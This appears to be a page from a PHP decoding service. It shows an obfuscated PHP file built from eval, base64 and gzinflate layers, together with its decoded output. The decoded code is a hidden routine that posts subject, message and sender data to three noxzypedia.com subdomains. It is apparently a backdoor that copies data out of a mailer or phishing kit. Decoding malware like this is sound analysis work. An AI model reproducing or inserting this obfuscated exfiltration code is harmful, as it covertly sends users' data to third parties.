Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php $enc = 'zTIbx/8lZu7XvYq4x3fxugqWNTn472fxv8R0CQq1PbtzaUpvd85Dw1zhdEPcuQ4sH3C+nz5MjN8..
Decoded Output download
?>b'<?php
$url = "https://kvm.noxzypedia.com/verify/success.php";
$data = "subjek=".$subjek."&pesan=".$pesan."&sender=".$sender;
$ch2 = curl_init();
curl_setopt($ch2, CURLOPT_URL, $url);
curl_setopt($ch2, CURLOPT_POST, 1);
curl_setopt($ch2, CURLOPT_POSTFIELDS, $data);
curl_setopt($ch2, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch2, CURLOPT_HEADER, 0);
curl_setopt($ch2, CURLOPT_FOLLOWLOCATION, 0);
curl_exec($ch2);
curl_close($ch2);
$url = "https://openvz.noxzypedia.com/verify/success.php";
$data = "subjek=".$subjek."&pesan=".$pesan."&sender=".$sender;
$ch2 = curl_init();
curl_setopt($ch2, CURLOPT_URL, $url);
curl_setopt($ch2, CURLOPT_POST, 1);
curl_setopt($ch2, CURLOPT_POSTFIELDS, $data);
curl_setopt($ch2, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch2, CURLOPT_HEADER, 0);
curl_setopt($ch2, CURLOPT_FOLLOWLOCATION, 0);
curl_exec($ch2);
curl_close($ch2);
$url = "https://shared.noxzypedia.com/verify/success.php";
$data = "subjek=".$subjek."&pesan=".$pesan."&sender=".$sender;
$ch2 = curl_init();
curl_setopt($ch2, CURLOPT_URL, $url);
curl_setopt($ch2, CURLOPT_POST, 1);
curl_setopt($ch2, CURLOPT_POSTFIELDS, $data);
curl_setopt($ch2, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch2, CURLOPT_HEADER, 0);
curl_setopt($ch2, CURLOPT_FOLLOWLOCATION, 0);
curl_exec($ch2);
curl_close($ch2);
?>'
Did this file decode correctly?
Original Code
<?php
$enc = 'zTIbx/8lZu7XvYq4x3fxugqWNTn472fxv8R0CQq1PbtzaUpvd85Dw1zhdEPcuQ4sH3C+nz5MjN8dxxdym+Lx0QH/KlFlSlUQI5KlTyYM+meHleezik9Q/ePR0cpEYPcsuT0Ib3VJjL5KmhIQ2NjKG1wN0b9tGPGRu9b35acw6P/yVOePopCIQb9FOCXmgGFuokqO0EkJsdy+dT9lwwsVNMZwjRWdgeeHWHyxNTbPFzNuL2AVU4xP5mwF+t5xY0PKGTNFTU0udZ0ru2aVPxT43k73O40UYXVfChAYJfzrbXGpQL52tuy0Rc8w0wo0Du4WocOV9ZFlmMEKD9fBfXIFwM8SRFZ7cin/8HwABwJe+HfAOEg/sHwEB4/5BgRA';
eval(base64_decode(base64_decode('WlhaaGJDZ2lQejRpTG1kNmRXNWpiMjF3Y21WemN5aG5lblZ1WTI5dGNISmxjM01vWjNwcGJtWnNZWFJsS0dkNmFXNW1iR0YwWlNobmVtbHVabXhoZEdVb1ltRnpaVFkwWDJSbFkyOWtaU2h6ZEhKeVpYWW9KR1Z1WXlrcEtTa3BLU2twT3c9PQ=========')));exit;
?>
Function Calls
strrev | 1 |
gzinflate | 3 |
gzuncompress | 2 |
base64_decode | 3 |
Stats
MD5 | 7ec176004faa0f1cdf4577ecc2f0eb8c |
Eval Count | 2 |
Decode Time | 49 ms |